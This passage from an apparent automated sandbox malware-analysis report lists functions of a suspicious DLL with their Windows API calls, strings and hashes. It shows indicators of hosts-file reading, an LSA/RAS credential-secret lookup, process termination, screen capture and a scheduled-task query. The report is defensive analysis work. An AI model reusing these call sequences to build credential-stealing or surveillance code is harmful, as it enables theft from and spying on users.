                                                          • API String ID: 839562100-350676929
                                                          • Opcode ID: 4be524b758586956944c9cf266d6c6eb3a393cda1bd587d0aa69720bbd559af3
                                                          • Instruction ID: 1ed5652b7448f0d279fc009ec0fc7650b7380c8c77e483b0f181bc9d886ff7ae
                                                          • Opcode Fuzzy Hash: 4be524b758586956944c9cf266d6c6eb3a393cda1bd587d0aa69720bbd559af3
                                                          • Instruction Fuzzy Hash: 60516F71A04289AEDB00DBA8CC84FEF7BB8EB99754F054109F604AB291DB74E940CB60
                                                          Function 1000A130 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 116stringsleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #540.MFC42 ref: 1000A14F
                                                          • #540.MFC42 ref: 1000A163
                                                          • #860.MFC42(00000000), ref: 1000A1B1
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 10011005
                                                            • Part of subcall function 10010FD0: #825.MFC42(?), ref: 10011044
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 1001105A
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 10011067
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 10011074
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 10011081
                                                            • Part of subcall function 10010FD0: #801.MFC42 ref: 1001108E
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 1001109B
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 100110A8
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 100110B8
                                                          • lstrcpyA.KERNEL32(?,?,00000000), ref: 1000A1DA
                                                          • CreateFileA.KERNEL32(?,00000008,00000001,00000000,00000003,00000000,00000000), ref: 1000A1ED
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 1000A1FD
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000A20B
                                                          • PathFindFileNameA.SHLWAPI(?), ref: 1000A216
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 1000A225
                                                          • GetFileAttributesExA.KERNEL32(?,00000000,?), ref: 1000A233
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 1000A243
                                                          • wsprintfA.USER32 ref: 1000A276
                                                          • #823.MFC42(0000022E), ref: 1000A281
                                                          • Sleep.KERNEL32(0000000A), ref: 1000A2B1
                                                          • #800.MFC42 ref: 1000A2C5
                                                          • #800.MFC42 ref: 1000A2D9
                                                            • Part of subcall function 10011EC0: #858.MFC42(00000000,?,00000000,00000000,?,00000000,00000000,10098838,000000FF,1000A1AC), ref: 10011EF8
                                                            • Part of subcall function 10011EC0: #800.MFC42(00000000,?,00000000,00000000,?,00000000,00000000,10098838,000000FF,1000A1AC), ref: 10011F09
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #800$File$#540Timelstrcpy$#801#823#825#858#860AttributesCloseCreateFindHandleNamePathSizeSleepSystemwsprintf
                                                          • String ID: %d-%d-%d
                                                          • API String ID: 4162832437-1067691376
                                                          • Opcode ID: 4c5e51f3c3ce9325c0f13647d86720a2bd2c162aee3e428c51b27422406379ed
                                                          • Instruction ID: e65afb7b552d62d436e06514f25d1dc28ad07c56c8aeeae503be500a7d4ecf2d
                                                          • Opcode Fuzzy Hash: 4c5e51f3c3ce9325c0f13647d86720a2bd2c162aee3e428c51b27422406379ed
                                                          • Instruction Fuzzy Hash: 67419079148382ABE324DB64CC49FAFB7A8FF85700F044A2CF599972D1CB74A544CB62
                                                          Function 10021EB0 Relevance: 29.8, APIs: 10, Strings: 7, Instructions: 96libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,ReadFile), ref: 10021ECA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021ED3
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,LocalAlloc), ref: 10021EE3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021EE6
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,LocalFree), ref: 10021EF6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021EF9
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,Sleep), ref: 10021F09
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021F0C
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,PeekNamedPipe), ref: 10021F1C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021F1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: KERNEL32.dll$LocalAlloc$LocalFree$PeekNamedPipe$ReadFile$Sleep$kernel32.dll
                                                          • API String ID: 2574300362-1218197485
                                                          • Opcode ID: 53fbd318c39a07f1d325d92356b8311e021181341d86685af80a3da864f05af0
                                                          • Instruction ID: 2137de244a99c4ceb672b61d5efac56e57c1beb31eadb3cb9e9ffd32c1e914e2
                                                          • Opcode Fuzzy Hash: 53fbd318c39a07f1d325d92356b8311e021181341d86685af80a3da864f05af0
                                                          • Instruction Fuzzy Hash: 66312DB16143496BD714EFB1CD48F9B7AE8EFC8744F00092DB688A7140DB74E905CBA6
                                                          Function 1001A220 Relevance: 28.0, APIs: 2, Strings: 14, Instructions: 49libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32 ref: 1001A292
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1001A299
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: G$I$N$S$a$f$i$kernel32.dll$m$n$o$s$v$y
                                                          • API String ID: 1646373207-3978980583
                                                          • Opcode ID: 3730fcdcbc7108c25aa30276657fce119730defac61445f6caf977d2f40e444b
                                                          • Instruction ID: bfef907bca7166945bb8c4c048d14843ea41578d74aef9e94cfa9c66aad3b8c8
                                                          • Opcode Fuzzy Hash: 3730fcdcbc7108c25aa30276657fce119730defac61445f6caf977d2f40e444b
                                                          • Instruction Fuzzy Hash: 18111C1050C3C28EE302DB6C844838FBFD55BA2644F48888DF4D84A293D2BAC69CC7B7
                                                          Function 10018A50 Relevance: 27.2, APIs: 18, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadCursorA.USER32(00000000,00000000), ref: 10018B13
                                                            • Part of subcall function 100193B0: ReleaseDC.USER32(?,?), ref: 100193CA
                                                            • Part of subcall function 100193B0: GetDesktopWindow.USER32 ref: 100193D0
                                                            • Part of subcall function 100193B0: GetDC.USER32(00000000), ref: 100193DD
                                                          • GetDesktopWindow.USER32 ref: 10018B62
                                                          • GetDC.USER32(00000000), ref: 10018B6F
                                                          • GetTickCount.KERNEL32 ref: 10018B83
                                                          • GetSystemMetrics.USER32(00000000), ref: 10018BAD
                                                          • GetSystemMetrics.USER32(00000001), ref: 10018BB4
                                                          • CreateCompatibleDC.GDI32(?), ref: 10018BD2
                                                          • CreateCompatibleDC.GDI32(?), ref: 10018BDB
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 10018BE4
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 10018BEA
                                                          • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 10018C49
                                                          • CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 10018C5A
                                                          • CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 10018C6E
                                                          • SelectObject.GDI32(?,?), ref: 10018C84
                                                          • SelectObject.GDI32(?,?), ref: 10018C8E
                                                          • SelectObject.GDI32(?,?), ref: 10018C9E
                                                          • SetRect.USER32(00000034,00000000,00000000,?,?), ref: 10018CAE
                                                          • #823.MFC42(00000002), ref: 10018CBD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$#823CountCursorLoadRectReleaseTick
                                                          • String ID:
                                                          • API String ID: 704209761-0
                                                          • Opcode ID: 9e4a370fffcece8fbec7a61461ab6de9897d787a6ad9132f8615e26d857d306e
                                                          • Instruction ID: b86d6b879deca8f43264229754a3adc1f6ec2cd8ec19f7890218ae82cecf81d1
                                                          • Opcode Fuzzy Hash: 9e4a370fffcece8fbec7a61461ab6de9897d787a6ad9132f8615e26d857d306e
                                                          • Instruction Fuzzy Hash: 2E81F3B4504B459FD320DF69C884A67FBE9FB88704F004A1DE59A87750DBB9F805CBA1
                                                          Function 1000BBB0 Relevance: 27.1, APIs: 18, Instructions: 110processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                          • Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                          • #4202.MFC42(00000000), ref: 1000BC03
                                                          • Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                          • #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                          • #4202.MFC42 ref: 1000BC35
                                                          • #5572.MFC42(000000FF), ref: 1000BC78
                                                          • #800.MFC42(000000FF), ref: 1000BC88
                                                          • Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                          • #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                          • #800.MFC42 ref: 1000BCC0
                                                          • OpenProcess.KERNEL32(00000001,00000000,00000128), ref: 1000BCE7
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000BCF1
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000BCF8
                                                          • #5572.MFC42(000000FF), ref: 1000BD04
                                                          • #5572.MFC42(000000FF,000000FF), ref: 1000BD12
                                                          • #800.MFC42(000000FF,000000FF), ref: 1000BD22
                                                          • #800.MFC42(000000FF,000000FF), ref: 1000BD39
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #5572#800$Process32$#4202NextProcess$#537CloseCreateFirstHandleOpenSnapshotTerminateToolhelp32
                                                          • String ID:
                                                          • API String ID: 1944864456-0
                                                          • Opcode ID: fdc46ebd97d5fef3205ec45985500fc953ff3a241d315039a7be263562148bc3
                                                          • Instruction ID: ee7fe5d149508e1b0384bfe3d7b9a40c8a8a5284b934431346b927ad99a76550
                                                          • Opcode Fuzzy Hash: fdc46ebd97d5fef3205ec45985500fc953ff3a241d315039a7be263562148bc3
                                                          • Instruction Fuzzy Hash: 18417F350083859FE360DF64C891EEFB7D9EF953A0F944B2DF4A9421E1EB34A908C652
                                                          Function 1001D890 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 155stringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32 ref: 1001D8AD
                                                          • strrchr.MSVCRT ref: 1001D8C3
                                                          • strrchr.MSVCRT ref: 1001D904
                                                          • isdigit.MSVCRT ref: 1001D93C
                                                          • memmove.MSVCRT(?,?), ref: 1001D95D
                                                          • atoi.MSVCRT(?), ref: 1001D995
                                                          • sprintf.MSVCRT ref: 1001D9B9
                                                            • Part of subcall function 1001D480: GetFileAttributesA.KERNEL32(?,1001D9C8,?), ref: 1001D485
                                                          • sprintf.MSVCRT ref: 1001D9E3
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 1001DA13
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001DA23
                                                          • printf.MSVCRT ref: 1001DA36
                                                          • printf.MSVCRT ref: 1001DA50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$printfsprintfstrrchr$AttributesCloseCreateHandleModuleNameatoiisdigitmemmove
                                                          • String ID: At least one INI file in range 1 to 30 already exists.$C:\ProgramData\%d.ini$INI file path: %s
                                                          • API String ID: 584443958-3437802155
                                                          • Opcode ID: ecfa0505082e4dfa5f6275c7d2c7198c536a48106970dfda59896f05695f367f
                                                          • Instruction ID: 5a7b3a4d73dd47240bac3d5cbec9a65bd00b000c9cf2a649af0ca0c46a2bcf42
                                                          • Opcode Fuzzy Hash: ecfa0505082e4dfa5f6275c7d2c7198c536a48106970dfda59896f05695f367f
                                                          • Instruction Fuzzy Hash: 544147761143141BE324E7789C85BEB37D8FB84324F040E29FA59D71D1EBB5E68883A2
                                                          Function 10029540 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 105filememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 10029574
                                                          • GetCurrentProcess.KERNEL32(?), ref: 1002957F
                                                          • IsWow64Process.KERNEL32(00000000), ref: 10029586
                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 100295D1
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000000,00000000), ref: 100295EB
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 100295FB
                                                          • LocalAlloc.KERNEL32(00000040,00000002), ref: 10029609
                                                          • ReadFile.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 1002961E
                                                          • LocalFree.KERNEL32(00000000), ref: 10029629
                                                          • CloseHandle.KERNEL32(00000000), ref: 10029630
                                                          • CloseHandle.KERNEL32(00000000), ref: 10029641
                                                          • LocalSize.KERNEL32(00000000), ref: 1002964B
                                                          • LocalFree.KERNEL32(00000000), ref: 1002965D
                                                          Strings
                                                          • \sysnative\drivers\etc\hosts, xrefs: 10029596
                                                          • \system32\drivers\etc\hosts, xrefs: 1002959D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileLocal$CloseFreeHandleProcessSize$AllocAttributesCreateCurrentDirectoryReadWindowsWow64
                                                          • String ID: \sysnative\drivers\etc\hosts$\system32\drivers\etc\hosts
                                                          • API String ID: 2528494210-1011561390
                                                          • Opcode ID: b3a1b05fe94a7ef03e9c76f26f647362320a5b5e58716595bdb8bd7f185e6a4f
                                                          • Instruction ID: 0dc2874ec59e71b04e8ffe4cacdfc1c4cd4d7ebfa2bc456f337be279ea52e32f
                                                          • Opcode Fuzzy Hash: b3a1b05fe94a7ef03e9c76f26f647362320a5b5e58716595bdb8bd7f185e6a4f
                                                          • Instruction Fuzzy Hash: CA31E5352002146FE3159F78DC89FEB77A8FB88320F144B2DF75A921D0DBB499098765
                                                          Function 10020A40 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 160processpipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreatePipe.KERNEL32 ref: 10020A72
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,00000044,?), ref: 10020AED
                                                          • CloseHandle.KERNEL32(?), ref: 10020AFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$CloseHandlePipeProcess
                                                          • String ID: D$schtasks /Query /TN MM
                                                          • API String ID: 1262542551-2635328053
                                                          • Opcode ID: a5ddbd22c73d49735de37707cb875a3f661527166062486b8fd150345d17fcb8
                                                          • Instruction ID: 0981537ea3ed7163310ddf7b13f575be98c0f6f7661eef0bbbfb29fdb67919c4
                                                          • Opcode Fuzzy Hash: a5ddbd22c73d49735de37707cb875a3f661527166062486b8fd150345d17fcb8
                                                          • Instruction Fuzzy Hash: A851DF75604351AFD721CF28C884AEFBBE6FB88744F944A1EF98987240D77599048B92
                                                          Function 1003DCA0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: getenv
                                                          • String ID: JSIMD_FORCE3DNOW$JSIMD_FORCEAVX2$JSIMD_FORCEMMX$JSIMD_FORCENONE$JSIMD_FORCESSE$JSIMD_FORCESSE2$JSIMD_NOHUFFENC
                                                          • API String ID: 498649692-40509672
                                                          • Opcode ID: 372bc83dcd6d19d883c5cd6b0a874edae0f2d566c33e9c8da4bd2e16f7e542bf
                                                          • Instruction ID: 61bb3af44d43969043d6c6946545a93c985996945898b62b2316370d7146a686
                                                          • Opcode Fuzzy Hash: 372bc83dcd6d19d883c5cd6b0a874edae0f2d566c33e9c8da4bd2e16f7e542bf
                                                          • Instruction Fuzzy Hash: FA2129EBA202442FF755E2327D4976531C1E7A13E2FDA8131E804DF6C2FA28DC469392
                                                          Function 10005A50 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 93libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 10005AA7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005AAE
                                                            • Part of subcall function 10005310: LoadLibraryA.KERNEL32(kernel32.dll,FreeLibrary,?,L$_RasDefaultCredentials#0,00000000), ref: 1000532C
                                                            • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 10005335
                                                            • Part of subcall function 10005310: LoadLibraryA.KERNEL32 ref: 10005386
                                                            • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 10005389
                                                            • Part of subcall function 10005310: LoadLibraryA.KERNEL32(?,IsValidSid), ref: 10005397
                                                            • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 1000539A
                                                          • wsprintfA.USER32 ref: 10005B17
                                                            • Part of subcall function 100058B0: LoadLibraryA.KERNEL32 ref: 1000590A
                                                            • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005913
                                                            • Part of subcall function 100058B0: LoadLibraryA.KERNEL32(?,LsaOpenPolicy), ref: 10005923
                                                            • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005926
                                                            • Part of subcall function 100058B0: LoadLibraryA.KERNEL32(?,LsaClose), ref: 10005934
                                                            • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005937
                                                            • Part of subcall function 10005B80: LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,00000000,00000000), ref: 10005B96
                                                            • Part of subcall function 10005B80: GetProcAddress.KERNEL32(00000000), ref: 10005B9D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
